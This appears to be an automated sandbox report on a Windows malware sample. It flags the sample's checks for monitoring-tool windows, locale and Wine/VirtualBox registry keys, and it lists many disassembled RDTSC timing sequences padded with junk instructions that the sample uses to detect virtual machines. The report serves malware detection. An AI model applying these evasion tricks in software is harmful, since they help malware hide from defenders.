Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

1_2_00A69860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E385 second address: E2E399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F60F0BA102Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E221C8 second address: E221D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2DC5E second address: E2DC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0BA1034h 0x00000009 popad 0x0000000a jc 00007F60F0BA1028h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E309BC second address: E30A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F60F0C8AB58h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 jmp 00007F60F0C8AB5Eh 0x0000002d or ecx, dword ptr [ebp+122D2890h] 0x00000033 push 77BECC32h 0x00000038 push ebx 0x00000039 jmp 00007F60F0C8AB61h 0x0000003e pop ebx 0x0000003f xor dword ptr [esp], 77BECCB2h 0x00000046 mov dl, 7Bh 0x00000048 push 00000003h 0x0000004a jmp 00007F60F0C8AB63h 0x0000004f push 00000000h 0x00000051 and di, 6FB6h 0x00000056 jnl 00007F60F0C8AB59h 0x0000005c push 00000003h 0x0000005e mov edi, dword ptr [ebp+122D29C8h] 0x00000064 call 00007F60F0C8AB59h 0x00000069 push ecx 0x0000006a push edi 0x0000006b push eax 0x0000006c pop eax 0x0000006d pop edi 0x0000006e pop ecx 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 jp 00007F60F0C8AB56h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30A70 second address: E30A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30A76 second address: E30ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jnc 00007F60F0C8AB69h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F60F0C8AB5Eh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30ABE second address: E30AEE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F60F0BA102Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f jmp 00007F60F0BA1037h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30AEE second address: E30B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b jl 00007F60F0C8AB56h 0x00000011 lea ebx, dword ptr [ebp+1245286Dh] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F60F0C8AB58h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D17BCh], esi 0x00000037 mov edx, dword ptr [ebp+122D3444h] 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007F60F0C8AB69h 0x00000044 push eax 0x00000045 push edx 0x00000046 jnl 00007F60F0C8AB56h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30C09 second address: E30C13 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30C13 second address: E30C49 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F0C8AB58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 327B780Ch 0x00000013 jg 00007F60F0C8AB5Ah 0x00000019 mov dx, 9CB4h 0x0000001d lea ebx, dword ptr [ebp+12452876h] 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F60F0C8AB5Eh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30C49 second address: E30C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30D06 second address: E30D63 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F60F0C8AB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F60F0C8AB69h 0x00000011 jnc 00007F60F0C8AB5Ch 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d jne 00007F60F0C8AB5Ch 0x00000023 jmp 00007F60F0C8AB61h 0x00000028 popad 0x00000029 mov eax, dword ptr [eax] 0x0000002b push eax 0x0000002c push edx 0x0000002d push esi 0x0000002e push edi 0x0000002f pop edi 0x00000030 pop esi 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30D63 second address: E30E22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F60F0BA1035h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F60F0BA1033h 0x00000014 pop eax 0x00000015 jl 00007F60F0BA1026h 0x0000001b xor dword ptr [ebp+122D33D3h], ecx 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007F60F0BA1028h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d push 00000000h 0x0000003f jng 00007F60F0BA102Ch 0x00000045 mov dword ptr [ebp+122D20BEh], esi 0x0000004b push 00000003h 0x0000004d push 00000000h 0x0000004f push ecx 0x00000050 call 00007F60F0BA1028h 0x00000055 pop ecx 0x00000056 mov dword ptr [esp+04h], ecx 0x0000005a add dword ptr [esp+04h], 00000019h 0x00000062 inc ecx 0x00000063 push ecx 0x00000064 ret 0x00000065 pop ecx 0x00000066 ret 0x00000067 jl 00007F60F0BA1029h 0x0000006d movzx edi, di 0x00000070 push BB8E6E64h 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F60F0BA1039h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30E22 second address: E30E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30E28 second address: E30E49 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 7B8E6E64h 0x00000013 lea ebx, dword ptr [ebp+12452881h] 0x00000019 movzx edx, ax 0x0000001c push eax 0x0000001d pushad 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50A2E second address: E50A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50BB3 second address: E50BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0BA102Eh 0x00000009 popad 0x0000000a push esi 0x0000000b jmp 00007F60F0BA1031h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F60F0BA1026h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50BE1 second address: E50BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F60F0C8AB6Ch 0x0000000c jmp 00007F60F0C8AB60h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50D8B second address: E50D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50D8F second address: E50DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60F0C8AB62h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E510A6 second address: E510B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E510B8 second address: E510E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0C8AB5Dh 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F60F0C8AB63h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E510E3 second address: E5110A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60F0BA102Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60F0BA102Eh 0x00000012 ja 00007F60F0BA1026h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E51266 second address: E5126A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5126A second address: E51287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F60F0BA102Eh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E51415 second address: E5145D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Eh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F60F0C8AB66h 0x00000011 pushad 0x00000012 jnp 00007F60F0C8AB56h 0x00000018 jmp 00007F60F0C8AB65h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E44950 second address: E44956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E44956 second address: E44960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F60F0C8AB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E44960 second address: E44966 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5233A second address: E52343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E52343 second address: E52349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E55CF1 second address: E55CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E20724 second address: E20728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E57B80 second address: E57B8E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60F0C8AB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E57B8E second address: E57B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E57B92 second address: E57BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F60F0C8AB64h 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F60F0C8AB56h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5818F second address: E581A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jl 00007F60F0BA1026h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E56A14 second address: E56A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F0C8AB5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E58279 second address: E5827D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5827D second address: E58283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D517 second address: E5D51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D51B second address: E5D527 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F60F0C8AB56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D527 second address: E5D54E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F0BA1037h 0x00000008 js 00007F60F0BA1032h 0x0000000e jp 00007F60F0BA1026h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D54E second address: E5D559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D559 second address: E5D55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D55D second address: E5D578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F60F0C8AB56h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D6CC second address: E5D6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D6D0 second address: E5D6EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F0C8AB65h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5DC16 second address: E5DC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F60F0BA102Ch 0x0000000c jbe 00007F60F0BA1026h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5DC2B second address: E5DC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0C8AB63h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jmp 00007F60F0C8AB67h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5DDB8 second address: E5DDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5DDBF second address: E5DDD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F60F0C8AB56h 0x00000009 je 00007F60F0C8AB56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5DF02 second address: E5DF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1032h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5E7F6 second address: E5E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5E8E8 second address: E5E8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5E8F5 second address: E5E910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F0C8AB5Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5E910 second address: E5E936 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 or edi, dword ptr [ebp+122D1B4Eh] 0x0000000e push E19D5980h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F60F0BA1031h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5E936 second address: E5E93B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5EA6E second address: E5EA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5EA72 second address: E5EA76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5EC18 second address: E5EC1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5F52B second address: E5F531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5F66C second address: E5F683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60F0BA102Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5F8A8 second address: E5F8AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FA51 second address: E5FA55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FA55 second address: E5FA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FA5F second address: E5FA6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FA6C second address: E5FA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FA70 second address: E5FA79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FAF6 second address: E5FAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FAFA second address: E5FAFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FAFF second address: E5FB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jne 00007F60F0C8AB5Bh 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E609F5 second address: E609F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E609F9 second address: E609FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6080E second address: E6082D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60F0BA102Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 js 00007F60F0BA1026h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6082D second address: E60847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F60F0C8AB65h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A0ED second address: E6A0FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F60F0BA1026h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E63B40 second address: E63B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A0FB second address: E6A0FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E63B44 second address: E63B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c jnp 00007F60F0C8AB5Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A0FF second address: E6A111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F60F0BA1026h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E63B6C second address: E63B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
